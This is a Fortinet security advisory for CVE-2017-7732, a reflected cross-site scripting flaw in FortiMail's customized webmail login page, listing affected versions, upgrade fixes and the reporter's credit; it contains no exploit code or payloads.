FortiMail reflected XSS vulnerability under customized webmail login page
Fortinet PSIRT Advisories
Fortinet PSIRT Contact:
Website: https://fortiguard.fortinet.com/faq/psirt-contact
FG-IR-17-099
Final
1
1
2017-10-13T00:00:00
Current version
2017-10-13T00:00:00
2017-10-13T00:00:00
There exists a reflected cross-site scripting (XSS) vulnerability on FortiMail customized pre-authentication webmail login page, allowing successful attackers to run arbitrary javascript code in the security context of their victim's browser.
Cross-site scripting (XSS)
FortiMail 5.2.0 -> 5.2.9FortiMail 5.3.0 -> 5.3.9FortiMail 5.1 and below.
FortiMail 5.2 branch, upgrade to 5.2.10 or above. FortiMail 5.3 branch, upgrade to 5.3.10 or above FortiMail 5.4 branch, not impacted. FortiMail 5.1 and below, use the system default login portal instead of a customized webmail login portal.
Fortinet is pleased to thank Silas Aitchison for reporting this vulnerability under responsible disclosure.
FortiMail 5.3.9
FortiMail 5.3.8
FortiMail 5.3.7
FortiMail 5.3.6
FortiMail 5.3.5
FortiMail 5.3.4
FortiMail 5.3.3
FortiMail 5.3.2
FortiMail 5.3.1
FortiMail 5.3.0
FortiMail 5.2.9
FortiMail 5.2.8
FortiMail 5.2.7
FortiMail 5.2.6
FortiMail 5.2.5
FortiMail 5.2.4
FortiMail 5.2.3
FortiMail 5.2.2
FortiMail 5.2.1
FortiMail 5.2.0
FortiMail reflected XSS vulnerability under customized webmail login page
CVE-2017-7732
FortiMail-5.3.9
FortiMail-5.3.8
FortiMail-5.3.7
FortiMail-5.3.6
FortiMail-5.3.5
FortiMail-5.3.4
FortiMail-5.3.3
FortiMail-5.3.2
FortiMail-5.3.1
FortiMail-5.3.0
FortiMail-5.2.9
FortiMail-5.2.8
FortiMail-5.2.7
FortiMail-5.2.6
FortiMail-5.2.5
FortiMail-5.2.4
FortiMail-5.2.3
FortiMail-5.2.2
FortiMail-5.2.1
FortiMail-5.2.0
0
https://fortiguard.fortinet.com/psirt/FG-IR-17-099
FortiMail reflected XSS vulnerability under customized webmail login page
Reference>